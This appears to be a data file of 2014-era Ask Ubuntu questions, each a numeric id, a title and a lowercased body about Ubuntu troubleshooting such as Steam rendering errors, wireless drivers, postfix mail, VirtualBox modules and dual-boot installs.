506349	opengl glx context is not using direct rendering , which may cause performance problems . ( steam ) amd driver	when i start steam in a terminal , i get the following error messages charlie @ steammpl : ~ $ steam rm : no se puede borrar «/home/charlie/.steam/steam» : es un directorio rm : no se puede borrar «/home/charlie/.steam/bin» : es un directorio running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically [ 2014-08-03 11:50:13 ] startup - updater built jul 15 2014 18:14:26 installing breakpad exception handler for appid ( steam ) /version ( 1405474565_client ) libgl error : failed to load driver : swrast looks like steam did n't shutdown cleanly , scheduling immediate update check installing breakpad exception handler for appid ( steam ) /version ( 1405474565_client ) [ 2014-08-03 11:50:14 ] checking for update on startup [ 2014-08-03 11:50:14 ] buscando actualizaciones disponibles ... installing breakpad exception handler for appid ( steam ) /version ( 1405474565_client ) [ 2014-08-03 11:50:14 ] download skipped : /client/steam_client_ubuntu12 version 1405474565 , installed version 1405474565 [ 2014-08-03 11:50:14 ] nothing to do [ 2014-08-03 11:50:14 ] verificando instalación ... [ 2014-08-03 11:50:14 ] performing checksum verification of executable files [ 2014-08-03 11:50:15 ] verification complete gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1405474565_client ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number [ 0803/115015 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation libgl error : failed to load driver : swrast error : opengl glx context is not using direct rendering , which may cause performance problems . hardware information : cpu : amd athlon x4 760k gpu : amd radeon r7 250 1 gb gddr5 ( driver : catalyst 14.4 ) ram : 8 gb ddr3 1600 please help me
506350	unstable wireless n	i am getting a really unstable wireless n connection on ubuntu 14.04 . this is the lspci output for my wireless adapter : 07:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) i have tried several things : disabled ipv6 disabled power save mode and finally i have disabled wireless n ( which i did not want to do ) my wireless speed was fluctuating really badly when i had wireless n enabled . disabling it has seemed to stabilize the connection . it rests on 54 mb/s with wireless n disabled . with wireless n enabled , the speed will bounce from 144 mb/s to 54 mb/s to 1 mb/s . also , download speeds would not be what they are supposed to . i have a 30 mb/s internet connection and even with wireless n disabled , speedtest.net is telling me that i am only getting 16 mb/s download speed . i was hoping to at least get my regular speed with n disabled . any help would be appreciated . i will post whatever outputs i need to if someone has an idea what might be wrong . thanks .
506351	php mail not working on ubuntu server	i have set up a development server using ubuntu server . i have configured postfix to send mail and i am able to send mail through the command line using for example : echo testing | mail -s bla myemail @ somewhere.com or via mail command . update : i have tried to execute the php script through command line and it works too update2 : when i run the script from browser i get this error : `` fatal : specify a password table via the `smtp_sasl_password_maps ' configuration parameter '' but date and time in the log are about a month in the past . i have also configured php.ini to send mail but with no luck . this is my php.ini settings for mail : [ mail function ] ; for win32 only . ; http : //php.net/smtp smtp = localhost ; http : //php.net/smtp-port smtp_port = 25 ; for win32 only . ; http : //php.net/sendmail-from sendmail_from = lssfsrv @ lssf.it ; for unix only . you may supply arguments as well ( default : `` sendmail -t -i '' ) . ; http : //php.net/sendmail-path sendmail_path = `` usr/sbin/sendmail -t -i '' ; force the addition of the specified parameters to be passed as extra parameters ; to the sendmail binary . these parameters will always replace the value of ; the 5th parameter to mail ( ) , even in safe mode . ; mail.force_extra_parameters = ; add x-php-originating-script : that will include uid of the script followed by the filename mail.add_x_header = on what am i doing wrong ? i guess the error is in php.ini since all the other settings are working !
506352	ubuntu desktop certified hardware for lenovo laptop `` g50-70 intel core i3 4010u ''	i have bought a lenovo laptop `` g50-70 intel core i3 4010u '' with pre-installed windows 8 . i would like to install linux but i ca n't find the software for my laptop here , which one is the most compatible with it .
506353	viber does not launch	i have installed viber 64 bit version and it worked just after the installation . however once i closed it , there is no way to launch it again . i even tried going to install directory and launching still nothing happens . please help..
506355	how to list all properties of folders	how to list the properties of folders in a directory . like , i want to 'find ./ -type d ' and at the same time 'll ' them .
506359	backing up a hdd using dd	i 'm trying to install linux mint alongside windows 8 on my laptop , but the install disc did not recognize windows , so i 'll have to do a custom install , which is something i 've never done , and i want to back up my win install in case i screw up and i ca n't fix it with the boot-repair cd . on my hdd first i have three hidden windows partitions , the 2nd one being the boot partition , the c : partition which has windows and important stuff that i want to back up , then the d : partition which is very large with media files and i do n't care much for it , and then some empty space where i would put linux at the end . i want to backup the hdd using dd . i do n't have enough space to back up the entire drive , but i can backup everything except the d : partition and the unallocated space . if i screw up the hdd during the linux install , will i be able to restore the win install from the dd backup ? i do n't mind if i lose data on the non-backed up partition . ( will the backup work if that partition gets corrupted in the meantime ? )
506365	udev error while upgrading	i update and upgrade my ubuntu 14.04 server . update is successfull but i get this error while upgrading : apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y setting up udev ( 204-5ubuntu20.3 ) ... * udev requires hotplug support , not started ... fail ! invoke-rc.d : initscript udev , action `` restart '' failed . dpkg : error processing package udev ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : udev e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i solve this ?
506367	how to connect jack-keyboard to amsynth using jack ?	i want to connect the virtual jack-keyboard to amsynth , but i ca n't get any sound out of the notes . i have connected the applications using jack like this : the output from amsynth to my speakers is working fine , since i do get sound when holding down amsynths audition button . i 'm on trusty 64 .
506369	unity desktop hangs while running browser along terminal	whenever i run my firefox browser a long the terminal , my ubuntu unity desktop hangs for a lot of time . it 's pretty annoying . is there a fix to it or should i try some other desktop environment like xfce or lxde . maybe gnome 3 ?
506370	what data does the software centre use to give you recommendations ?	just below the what 's new section there is a recommended for you section . currently i do n't have it enable , but other than the list of software , what data does it take about what you have installed ? does that list of software include software installed via synaptic or apt-get ? does it take data about the time ( or order ) of installation ? what does it use that data for ? ( other than recommendations , if any ) how does it work out what software you might like from that ? ( for example , does it take just the category , or more in depth categorisation ) ? if i have a installed and it recommends c , and i then installed b cause it to stop recommending c ?
506378	ubuntu on android - ca n't install	can i install ubuntu for android on htc one v ? it is a `` primo '' device . i 've tried once and got stuck at the following error : $ sudo ubuntu-device-flash -- channel=stable -- bootstrap 2014/08/03 23:16:44 expecting the device to be in the bootloader ... waiting 2014/08/03 23:16:44 device is |primou| 2014/08/03 23:16:44 device primou not found on server https : //system-image.ubuntu.com channel stable i also tried the devel channel but it did n't work too .
506380	is it possible to run ubuntu installer from hard drive partition ?	i would like to prepare something like recovery partition on the pc hard drive . such recovery partition should contain only ubuntu installer , nothing more . it also should be bootable in any way , even without any other bootable operating system - i mean situation when boot loader like grub is not available . it is quite easy to prepare such partition with ms windows installer : it is just to create ntfs partition , give it a bootable flag , and copy windows dvd content into it - no voodoo with bootloader required . is it possible to achieve such setup for ubuntu as well ? if not , i would also be glad to have such partition bootable from grub . i also know that it is easy to boot ubuntu installer from usb stick , but recovery partition has one big advantage : it can not be lost .
506381	problem with side panel buttons thinkpad l412 , ubuntu 14.04	i have the following problem : after a kernel update , my side panel buttons on my l412 to incresa/decrease and mute volume ( also de mic mute ) stopped working . i do n't know how to fix this , and the solutions for the thinkpad t520 does n't work . could someone help me ? thanks !
506382	mail delivery errors - ssmtp , mailutils , postfix	afternoon everyone , i do not run a mail server . i am only trying to send an email with an attachment via a bash script . i have been working for the past couple of days to get this up and running . i am trying to use a gmail account to send the email . it does send but it also tries to send to my computer and returns multiple fails when it does . needless to say i have no idea what i am doing when it comes to email stuff on linux so i am kinda just wandering around the internet trying different things here and there to see if they work . command i am trying to use : echo `` tester '' | ssmtp -s `` tired '' -a `` /home/bulsatar/pictures/travel-potty.jpg '' -- adifferentemail @ yahoo.com here is my ssmtp setup : root=postmaster mailhub=smtp.gmail.com:587 fromlineoverride=yes authuser=myaccount @ gmail.com authpass=mypassword usestarttls=yes here is the error i get from gmail when it sends : delivery to the following recipient failed permanently : /home/bulsatar/pictures/travel-potty.jpg @ mycomputername technical details of permanent failure : dns error : domain name not found how do i make it so it does n't try to send to my computer ? ? ? thanks for any help !
506383	menubar not showing with kde 4.13.2/ubuntu 14.04	the menu bar is not showing on any applications besides kde applications . anyone know how to get it to show ?
506384	how does dolphin and nautilus enable user samba shares without restarting smbd ?	and how can i manipulate these settings using command line tools ?
506385	black screen when plugging in intuos ctl 480 on ubuntu 12.04	i followed the instructions to install the wacom drivers from here : http : //matthewwittering.com/blog/ubuntu-tips/how-to-install-a-wacom-intuos-ctl-480-tablet-on-ubuntu.html but when i plug in the device , the screen goes black and i ca n't do anything at all . i just shut down the computer . when i restart it works , though .
506387	lubuntu 14.04.1 fresh install wo n't boot : runaway loop , usb	i have a fresh install of ubuntu 14.04.1 . i tried to boot into it several times , waiting > 4 minutes each time , and saw only a fat blinking cursor in the upper left . i chrooted into the os from a livecd flash stick , updated all packages , and told grub to give me the debugging output . i tried booting again and got this screen : ~4 minutes later , this came up : a reasonable ( albeit untimed ) amount of additional waiting did not result in additional messages . i 've searched my /var/log files for the key words here , but apparently the log was not saved . installing bootchart did not yield a log either . i 'm not sure what to do , but am considering installing an older kernel . any thoughts as to what the issue might be ?
506388	proper installation method for play on linux	how long does it take to install play on linux via the terminal ? i got as far as the end user agreement and nothing has happened past that
506389	webcam issues on lenovo ideapad y510 ( ubuntu 14.04 )	skype an google hangouts seem to be unable to use my build-in webcam on ideapad y510 . in skype it just does not show me the option to start video conversation . but when i am going to skype - > options - > video devices , it does recognize the webcam : lenovo easycamera ( /dev/video0 ) i am able to see myself there . needless to say the checkbox enable skype video is checked . in google hangouts my feed from webcam is shows black screen . ( in the settings it is also shows correct device ) cheese seems to be working . i converted from windows to ubuntu just recently so please excuse if i am missing some 'obvious ' checks or steps before asking this question . i did lots of googling on this issue but could not find any useful solution . update : after installing v4l2 drivers and the control panel the issue is gone for the google hangouts . but not for skype ...
506393	random reboots/shutdowns after ram upgrade	i 'm running lubuntu 14.04 on an old dell dimension 8200 . after installing two 512 mb ram chips ( essentially increasing the ram form .25 gb to 1.25 ) , the system randomly shuts down or reboots . is this due to a temperature problem ? i tried installing lm-sensors , but the program could n't detect any devices to monitor . how do i diagnose/fix this problem ?
506399	i 'm receiving a gdb test error installing python 3.4.1 on 14.04	i 'm trying to create a virtualbox vm with ubuntu 14.04 and python 3.4.1 . i 've downloaded the source https : //www.python.org/ftp/python/3.4.1/python-3.4.1.tgz and i 've updated openssl to resolve a different test error sudo apt-get install libcurl4-openssl-dev now the test_gdb is failing , on what looks like 25 tests within test_gdb . one of the common themes in the failures is 'v @ entry= ( ) ' did not equal expected ' ( ) ' in test_tuples ( test.test_gdb.prettyprinttests ) i did confirm that gdb is installed . is there a development version of gdb that is needed , like what i needed to do with openssl ? if there is , i ca n't find it .
506404	experience with ubuntu 14.04 on yoga 2 pro	can someone who has installed ubuntu 14.04 on lenovo yoga 2 pro and is using it , tell me his or her impressions of work ? thank you : )
506405	( vitualbox ) using vboxdrv setup failed	so , i tried creating an os with virtualbox , and i got this error : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . so i did the obvious , running the vboxdrv setup . i ran this command : sudo service vboxdrv setup i got an error while doing so . : stopping kernel drivers ... done . uninstalling old virtualbox dkms kernel modules/etc/init.d/voboxdrv : 302 : /etc/init.d/vboxdrv : /usr/share/virtualbox/src/vboxhost/do_dkms : not found ... done . ( failed , trying without dkms ) recompiling virtualbox kernel modules ... failed ! ( look at /var/log/vbox-install.log to find out what went wrong . ) so , i took a look at /var/log/vbox-install.log to see if i can find anything . i got this error : /etc/init.d/vboxdrv : 334 : /etc/init.d/vboxdrv : /usr/share/virtualbox/src/vboxhost/build_in_tmp : not found any help ? thanks .
506412	i want to find out if my lenovo laptop has a sandy or ivy bridge	is there a command or a register to find this information on my laptop ? i need to know it before i install intel pstate . thanks . ps this is the result from the command from [ http : //askubuntu.com/users/158442/muru ] : sudo lshw -c cpu | grep more *-cpu beschre *-cpu beschreibung : cpu produkt : intel ( r ) core ( tm ) i5 cpu m 520 @ 2.40ghz hersteller : intel corp. physische id : 6 bus-informationen : cpu @ 0 version : intel ( r ) core ( tm ) i5 cpu m 520 @ 2.40ghz steckplatz : none größe : 1199mhz kapazität : 2400mhz breite : 64 bits takt : 133mhz fähigkeiten : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp x86-64 constant_tsc arc h_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 popcnt aes lahf_lm ida arat dtherm tpr_s hadow vnmi flexpriority ept vpid cpufreq konfiguration : cores=2 enabledcores=2 threads=4
506415	why i obtain this error when i try to perform this simple bash script ?	i am following this tutorial to correctly execute aptana studio on my ubuntu 14.04 : command menu in aptana studio 3 is not working in ubuntu 14.04 so i have installed the oracle jre and finnally i have create this run.sh file that have to execute aptana : ! /bin/bash export ubuntu_menuproxy=0 /home/andrea/programmi/aptana_studio_3/aptanastudio3 the problem is that when i try to execute this script with my shell i obtain the following error message : andrea @ andrea-virtual-machine : ~/programmi/aptana_studio_3 $ sudo sh run.sh run.sh : 1 : run.sh : ! /bin/bash : not found run.sh : 3 : export : /home/andrea/programmi/aptana_studio_3/aptanastudio3 : bad variable name why ? what am i missing ? how can i fix this issue ?
506424	is my gpu working correctly ?	nvidia geforce 525m . how can i test whether my gpu is actually working as a gpu , and it 's not my integrated graphics/cpu filling in ? my cpu load seems unusually high . instead of actual driver verification , i 'd just like to see some cool 3d stuff that does n't kill my cpu .
506426	usb thumb drive - why does file transfer speed vary so much ?	the thumb drive is fat32 . i often transfer files from the thumb drive to an internal hdd ( ext4 ) . sometimes , the files are transferred at about 15mb/s . sometimes , the files are transferred at about 150mb/s . sometimes , i do n't know what the transfer rate is but a 3gb file will take less than 10 sends to be transferred . it seems to me that this speed difference is related to whether usb2 or usb3 protocol is being used at the time , although i do n't know what the transfer rates are supposed to be for these protocols . in any case , why would it vary ? is there any way that i can always achieve the higher rate ?
506432	ubuntu wakes immediately after suspend with nouveau on geforce gt 525m	i 've seen a couple similar questions ( 1 , 2 , 3 , 4 , 5 ) , but neither seems to address my case . when i suspend , after a second , i see a terminal with the word `` nouveau '' ( implying nvidia problems ? ) , and the i get the login screen . acpitool -w : device s-state status sysfs node -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . p0p1 s4 *disabled 2 . ehc1 s0 *disabled pci:0000:00:1d.0 3 . ehc2 s0 *disabled pci:0000:00:1a.0 4 . rp01 s4 *disabled pci:0000:00:1c.0 5 . pxsx s4 *enabled pci:0000:02:00.0 6 . rp02 s4 *disabled 7 . pxsx s4 *disabled 8 . rp03 s3 *disabled pci:0000:00:1c.2 9 . pxsx s4 *enabled pci:0000:03:00.0 10 . rp05 s4 *disabled pci:0000:00:1c.4 11 . pxsx s4 *enabled pci:0000:04:00.0 12 . rp06 s4 *disabled 13 . pxsx s4 *disabled 14 . peg0 s4 *disabled pci:0000:00:01.0 15 . pegp s4 *disabled pci:0000:01:00.0 16 . lid0 s3 *enabled lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev a1 ) 02:00.0 network controller : intel corporation centrino wireless-n 1030 [ rainbow peak ] ( rev 34 ) 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) how can i make suspend work ?
506434	fix random bogus in disk manager ?	apparantly , ubuntu read my external drive fine until now . this is what happened afterwards . i am telling you this is no joke . ( the xterm windows i have running are my minecraft servers , they have nothing to do with this . )
506435	how to expand partition in gparted	i have 2 unallocated partitions in my dual boot laptop . i want to add these two unallocated partitions to `` /dev/sda5 '' partition . i to do in gparted .
506436	how to create maildir on user creation ?	how do i make the adduser script create the appropriate maildir directory of the new user ? i have an ubuntu server running postfix . when i first installed it was deliverying emails to /var/mail/ < user > / . i 've changed to use /home/ < user > /maildir by putting home_mailbox = maildir/ on /etc/postfix/main.cf . at first i did n't worked because there was n't a maildir directory for my user ( email was delivered back on my provider with the error ) . then i created the maildir directory , with the subdirectories new , cur and tmp as maildir uses . worked fine after that . but this way i would have to manually create those directories everytime i add an user . is there anyway to make the adduser script ( that is what i use ) to create those for me ?
506438	ubuntu 14.04 and elementary desktop	got stuck , hints welcome : ~ $ sudo add-apt-repository ppa : elementary-os/stable more info : https : //launchpad.net/~elementary-os/+archive/ubuntu/stable press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpmsyray20/secring.gpg ' created gpg : keyring `/tmp/tmpmsyray20/pubring.gpg ' created gpg : requesting key 4e1f8a59 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpmsyray20/trustdb.gpg : trustdb created gpg : key 4e1f8a59 : public key `` launchpad ppa for elementary os team '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok ~ $ sudo apt-get update & & sudo apt-get upgrade ign http : //extras.ubuntu.com trusty inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //ftp.uni-mainz.de trusty inrelease ign http : //archive.canonical.com trusty inrelease hit http : //extras.ubuntu.com trusty release.gpg ... . etc ign http : //ftp.uni-mainz.de trusty/universe translation-en_us fetched 1,541 kb in 23s ( 67.0 kb/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages were automatically installed and are no longer required : baloo libkfilemetadata4 libqt4-webkit : i386 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ~ $ sudo apt-get install elementary-desktop reading package lists ... done building dependency tree reading state information ... done e : unable to locate package elementary-desktop
506440	abnormally high fan speed on cool laptop , dell inspiron 15r 5520 , ubuntu 14.04,	i am using a dell inspiron 15r 5520 running ubuntu 14.04 alongside windows 8.1 . my issue is with the dell 's fan , which is running at full speed during most of the time the computer is booted into ubuntu . any small task i do , from searching for an app , to loading webpages and switching tabs in a browser , causes the fan speed to reach its max speed . oddly , the fan only does this when the computer is booted into ubuntu , but not windows 8.1 . i tried flashing my bios and updating my chip set , to no avail . system manager shows 4 cpu cores each running at above 10 % when the fan goes to its highest speed . and it will remain at this speed for several minutes thereafter . i noticed that the utilization percentages for each core does not match the cpu load average . for example , it said that the average was 0.43 at some point , but when i checked the core percentages while the fan was running high they are all lower , as if the monitor is adding the percentages together and using this to determine fan speed ( just my hypothesis ) . but there is still some correlation between fan speed and cpu usage . the dell is not hot when the fan is running high ; the air it blows is either cool or slightly warm . i recently cleaned the computer 's exhaust , too . lastly , i am a beginner at linux , so please , if you can , do n't be too technical with responses . and just to mention , i learned about jupiter , which i found out is discontinued , and i tried using i8kutils while following a thread from a forum when researching a solution and my fan was barely on after that ( had to re-install ubuntu ) . can anyone offer a solution to this issue ? thanks in advance , jordan
506443	how to copy files from cd drive	i put a cd into the drive but ca n't figure out how to access the files . i found out about find/files and installed it but do n't know what i should see or where i should see it . where does the cd drive appear ? this 50years-of-windows user will appreciate any help/guidance .
506444	i installed ubuntu 14.04 along side windows 7 and now the hibernation setting in windows wo n't work	i recently install ubuntu 14.04 along side windows 7 and enable the hibernation setting which works perfectly . however when i choose windows as my operating system and hibernate my computer and resume it , it says my computer ca n't come out of hibernation and prompts me to delete the restoration which restarts the computer . my question is will i be able to use the hibernation setting in windows . ps the sleep setting works but it drains my battery . also i find this very strange , when i choose ubuntu as my operating system and go near my router and go to a video site for e.g youtube it takes very long to buffer and on some occasions becomes unresponsive but when i am in the next room which is a few feet away from the router it runs smoothly.it is not a coincidence or one time thing , it happens all the time . is it the flash player or my router ? please help : ) thank you for taking the time to read this it means a lot to me . yours truly clyde .
506445	blank desktop after graphics driver	after i installed nvidia-current , my desktop looks like this : http : //imgur.com/aj9dznw -- - i 'm on my phone right now . how can i get the normal desktop back ?
506447	backup in 12.04 and restore in 14.04	is it possible to backup an ssd in ubntu 12.04 64bit and after a clean install of 14.04 64bit restore it ? in other words , if i want to do a clean install of ubuntu 14.04 how do i transfer all softwares , config files and important docs from the 12.04 to the new 14,04 ? for example , firefox ( with all the bookmarks and customization ) , gnome shell ( with all the installed extensions ) , virtualbox , chrome , printer , scanner ... . i do n't want to have to install and configure the many programs all over again . this is my pc : ubuntu : 12.04 amd 64bit ssd : 240gb ram : 16g ext hdd : 1tb
506450	trash bin empty automatic	my trash bin empties automatic and i lost some valuable files and i do n't remember i ever changed something in the settings , how can i fix this ?
506452	when i reach the installation it says : `` this computer currently has no detected operating systems. '' . what do i do to make it detect windows 8 ?	i followed these instructions to install ubuntu on my computer which already has windows 8 , i chose to burn it on a dvd . my computer is an asus x550cc . it did n't work , my computer simply restarts without doing any of the stuff it is supposed to do . i look it up and it seems to be because i have windows 8 and it uses uefi and not bios . i look for a solution . i then see those instructions . i write them all down to follow them when i try again . turns out my computer does something completely different . so i try to find the equivalents and disable the things that look like they should be disabled . i click on the boot override that corresponds to my dvd . it brings to the menu where i can click `` test ubuntu '' or `` install ubuntu '' . i click `` install ubuntu '' , follow the steps until the step where i must choose the `` installation type '' . that is where it says `` this computer currently has no detected operating systems. '' . which is obviously not true as i have windows 8 and i do n't want to delete it . why ca n't it detect windows ? what can i do to make it detect it ? i stop everything and go back to google and that is where i reach my limit because , i do n't understand anything of what i find . you see i understand that this problem has been stated many different times on askubuntu but i do not understand the answers . what you need to know is that i do n't know the first thing about computers . what i can do is follow instructions , however something always went wrong at some point and i ca n't improvise . the answers i have read said stuff about backing up things , and partitions and stuff , and i could n't understand even half of the instructions in the answers . it would mean a lot to me if someone took the time to explain to me what i need to do in a very detailed manner with lots of images so i know what i 'm looking for , because i am lost here ( sorry for the long text , but i tried to `` trace my steps '' for you because maybe i did something wrong but i did n't know that i should n't have done it ) .
506454	wireless networks not showing up	i installed ubuntu 12.04 on a new laptop but i am unable to connect to any wireless network , let alone see any wireless networks from the drop down in the top right corner . my ethernet connection works fine . when i 've searched the problem it seemed that all the solutions involved a broadcom network card , but i have a realtek . my guess is that i 'm missing some driver . i tried downloading additional drivers , but i get nothing for the wireless card . furthermore , there is no 'enable wi-fi ' option on the network drop down menu . output from iwconfig : lo no wireless extensions . eth0 no wireless extensions . output from rfkill list : 0 : hci0 : bluetooth soft blocked : no hard blocked : no portion of the output from sudo lshw : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:04:00.2 logical name : eth0 version : 0a serial : 80 : fa:5b:06:72 : a8 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.038.00-napi duplex=full ip=192.168.1.5 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:42 ioport : d000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff output from lspci -nn | grep network : 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec : b723 ]
506457	unable to log in to xubuntu 14.04	i have just built a new xubuntu 14.04 ( amd64 ; xfce desktop mgr ) from scratch . but now no one can log in to the non-admin account i have just created . not even me , the admin ( sort of ) . i strongly suspect that the problem came about after i changed the uid of the said account to another number . i have tried assigning other passwords to the account ; i have even ticked a setting that says : `` do not ask for password '' , via the gui . still a problem ; i can log in if i drop down to a non-gui login screen via ctl-alt-f2 . after logging me in , i can see a message : fopen permission denied . but i am in . it 's been a long tedious build . i 'd appreciate any help to get me going again . thx
506459	make ext3 filesystem with 128 bytes inode size	i need to format external hard disks to ext3 mbr with the inode size set to 128 bits . this is for a very specific use , i.e . the delivery of dcp to digital cinema servers . i 'd like to be able to do that in ubuntu . the challenge is that i am a total ubuntu newbie ( usually a mac osx user ) so i 'm looking for a simple solution , involving as little coding as possible ( at the moment , i would n't even know where to enter a command line ... ) so far , i have downloaded ubuntu desktop 14.04.1 , burned it to dvd , and successfully booted my mac pro in ubuntu ... wow ! i can see my hfs+ internal and external drives , everything seems to be working , except for wifi ( which does n't concern me for the moment ) . when i tried to use the included `` disk '' application to format the drive , i could not find any mention of inodes anywhere . is there a tool that would allow me to do this formatting easily ?
506464	ca n't run audacious	i ca n't run audacious in ubuntu 14.04 . everytime i try to run it , it says - fatal : no output plugin found . ( did you forget to install audacious-plugins ? ) aborted ( core dumped ) . but plugins are also installed .
506465	unity : have a window that is always on specific workspaces ?	i have two monitors and 4 workspaces configured in unity ( 2 monitor on each workspace ) . i do development using intellij ide on server side and hybrid mobile app frontend so i often have two instances of the ide open on different workspace on left monitor and browser for testing on the right like workspace 1 monitor 1 : ide with server code opened workspace 1 monitor 2 : browser that is serviced from the server code . workspace 2 monitor 1 : ide with hybrid browser app code open workspace 2 monitor 2 : browser with browser app now sometimes i would drag the ide on server code to be side by side with the browser app ide so i can check on some code and stuff . so my question is . is it possible to have a window to be 'always visible ' on only certain workspace ? so i have say server code ide always visible on monitor 2 of workspace 1 and workspace 3 and browser app ide always visible on monitor 1 of workspace 2 and 3 ? workspace 1 monitor 1 : browser that is serviced from the server code . workspace 1 monitor 2 : ide with server code opened ( pinned ) workspace 2 monitor 1 : ide with hybrid browser app code open ( pinned ) workspace 2 monitor 2 : browser with browser app workspace 3 monitor 1 : ide with hybrid browser app code open ( pinned ) workspace 3 monitor 2 : ide with server code opened ( pinned )
506466	1366x768 screen resolution not recognized	i 've just installed ubuntu 14.04 as my first dive into linux . the display seemed a bit wonky , so i checked the screen resolution . sure enough , it is set to 1368x768 when my monitor 's resolution is 1366x768 . i looked around for an answer to my question and came across some advice using the xrandr command , which i tried to no avail . does anyone have any suggestions on how to get ubuntu to recognize the correct screen resolution ? any help would be much appreciated !
506467	my micromax mmx310g is not recognized in ubuntu 14.04	my micromax mmx310g is not recognized in ubuntu 14.04 . i tried editing every file as the blogs told me , and i even downloaded sakis3g but it just says `` failed to connect '' . ubuntu 14.04 is giving me more problems that i thought it would . can any one help me with this issue ?
506475	macmini wo n't boot since installing 14.04	i have an a1347 macmini with ubuntu-14.04-desktop-amd64+mac installed . it worked fine with os x mavericks and while i was using it as an htpc with windows 7 -- before i installed 14.04 . since i installed trusty amd64+mac it does not boot an os , from the hdd or external media . when the system boots , it displays the white screen after the apple chime sound , then the screen turns black and it says `` operating system not found '' . when i hold option ( alt on a 101-key pc keyboard ) during the white loading screen , it brings up start up manager which shows only one disk labeled 'windows ' . i have a usb with refind 0.8.3 installed which start up manager will allow to run ; it offers 3 boot options ( 4 if i have a bootable usb plugged in ) : boot efi\ubuntu\grubx64.efi from 510 mib fat volume boot boot\vmlinuz-3.13.0-24-generic.efi.signed from 289 gib ext4 volume boot legacy os from fat volume none of the 3 options allow me to boot to any sort of working os . the first takes me to what looks like the grub2 boot prompt . the second looks like it is trying to boot ubuntu but fails with some uuid failures , and third has the same `` operating system not found '' error . further more , when i plug in a usb created with the ubuntu startup disk creator and the ubuntu-14.04-desktop-amd64+mac.iso it shows up on the refind list of options , but it also has the error for `` operating system not found '' . i 'm at my wit 's end . i ca n't get a dvd or bootable usb to boot this damned box , and when refind boots the hdd , ubuntu fails . any ideas on what to try next ? did i screw up the gpt partitioning or efi or something ?
506479	cant upgrade from 13.04 to 14.04	i have 13.04 and i am trying to upgrade by cd to 14.04 , because my update manager always says it cant find updates , but the option for upgrading is grey . what do i do ?
